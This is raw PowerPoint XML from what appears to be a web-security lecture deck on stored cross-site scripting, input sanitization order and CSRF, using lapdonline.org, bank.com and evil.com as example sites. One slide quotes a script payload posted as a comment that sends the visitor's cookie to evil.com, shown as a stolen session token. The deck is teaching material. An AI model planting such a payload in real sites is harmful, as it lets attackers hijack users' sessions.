      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3628103" y="4388489"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1258614" y="2183304"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="490346" y="1503618"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7245046" y="2237358"/>
            <a:ext cx="1102102" cy="1102102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5230341" y="2213328"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="Picture 18"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3938613" y="224713"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070648" y="4871041"/>
            <a:ext cx="1611339" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>lapdonline.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178691" y="772008"/>
            <a:ext cx="1001556" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="Picture 26"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2468543" y="224713"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="Picture 27"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5070648" y="5318254"/>
            <a:ext cx="1102102" cy="1102102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="TextBox 30"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5417906" y="1642610"/>
            <a:ext cx="2720488" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>evil.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>f9geiv33knv141</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="TextBox 31"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6681987" y="499037"/>
            <a:ext cx="2056427" cy="715089"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -23541"/>
              <a:gd name="adj2" fmla="val 10622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Session token for lapdonline.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3" name="Straight Arrow Connector 2"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3255524" y="3310567"/>
            <a:ext cx="683089" cy="1024448"/>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724400" y="3434364"/>
            <a:ext cx="286279" cy="731277"/>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349338" y="3547841"/>
            <a:ext cx="3556699" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrowCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19760"/>
              <a:gd name="adj2" fmla="val 25000"/>
              <a:gd name="adj3" fmla="val 28930"/>
              <a:gd name="adj4" fmla="val 87562"/>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200" dirty="0" smtClean="0"/>
              <a:t>Comment with text:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> = “evil.com/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Straight Arrow Connector 17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5044311" y="3434364"/>
            <a:ext cx="287274" cy="806152"/>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5070648" y="1633056"/>
            <a:ext cx="551051" cy="729144"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="571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6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p:bldP spid="32" grpId="0" animBg="1"/>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“Frontier Sanitization”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41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6629400" y="3321014"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5344439" y="2540152"/>
            <a:ext cx="3810000" cy="3657600"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 5554325"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:alpha val="4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14400" y="1329303"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="909181" y="3060754"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5088655"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="1883851"/>
            <a:ext cx="3352800" cy="1731452"/>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043153" y="3657600"/>
            <a:ext cx="3357647" cy="55627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124200" y="4834503"/>
            <a:ext cx="3276600" cy="80870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57800" y="1504116"/>
            <a:ext cx="364329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Sanitize all input immediately</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(SQL, XSS, bash, etc.)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rounded Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="990600" y="2743200"/>
            <a:ext cx="7315200" cy="14478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What order should the sanitization routines be applied? SQL then XSS, XSS then SQL?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33559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smtClean="0"/>
              <a:t>Context-Specific Sanitization</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42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4800600" y="2722446"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Arc 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6605505" y="1295400"/>
            <a:ext cx="2049546" cy="1988778"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 5554325"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent2">
                <a:alpha val="4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914400" y="1329303"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="909181" y="3060754"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="5088655"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Arrow Connector 11"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3124200" y="1883851"/>
            <a:ext cx="1447800" cy="1001174"/>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043153" y="3657600"/>
            <a:ext cx="1528847" cy="152400"/>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124200" y="4724400"/>
            <a:ext cx="1447800" cy="918803"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">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4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7260021" y="1625025"/>
            <a:ext cx="911250" cy="1260000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6172200" y="2057400"/>
            <a:ext cx="914400" cy="45720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6237994" y="2408086"/>
            <a:ext cx="914400" cy="45720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rot="10800000" flipV="1">
            <a:off x="3363206" y="4169851"/>
            <a:ext cx="2808994" cy="1854352"/>
          </a:xfrm>
          <a:prstGeom prst="curvedConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -13983"/>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Arc 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6085347" y="3894137"/>
            <a:ext cx="2049546" cy="1988778"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 300417"/>
              <a:gd name="adj2" fmla="val 4258914"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="63500">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:tailEnd type="none"/>
          </a:ln>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent5">
                <a:alpha val="40000"/>
              </a:scheme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6733237" y="3404491"/>
            <a:ext cx="1794081" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="TextBox 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5836196" y="5960871"/>
            <a:ext cx="1762277" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS Sanitization</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="927834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Cross Site Request Forgery (CSRF)</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43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1405809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Site Request Forgery (CSRF)</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i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>causes the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>end </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>user browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to execute unwanted actions on a web application in which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is currently authenticated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="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44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="928842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45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7036703" y="2759778"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1180914" y="990600"/>
            <a:ext cx="1905372" cy="1109097"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:duotone>
              <a:schemeClr val="accent1">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2269552" y="5364176"/>
            <a:ext cx="1219200" cy="1219200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
            </a:duotone>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7837024" y="4105220"/>
            <a:ext cx="1102102" cy="1102102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1185101" y="3989640"/>
            <a:ext cx="1240078" cy="1785712"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7004899" y="2367707"/>
            <a:ext cx="1136850" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1237448" y="3620308"/>
            <a:ext cx="1001556" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>evil.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Straight Arrow Connector 13"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="1447800"/>
            <a:ext cx="3733800" cy="83820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duotone>
              <a:schemeClr val="accent5">
                <a:shade val="45000"/>
                <a:satMod val="135000"/>
              </a:schemeClr>
              <a:prstClr val="white"/>
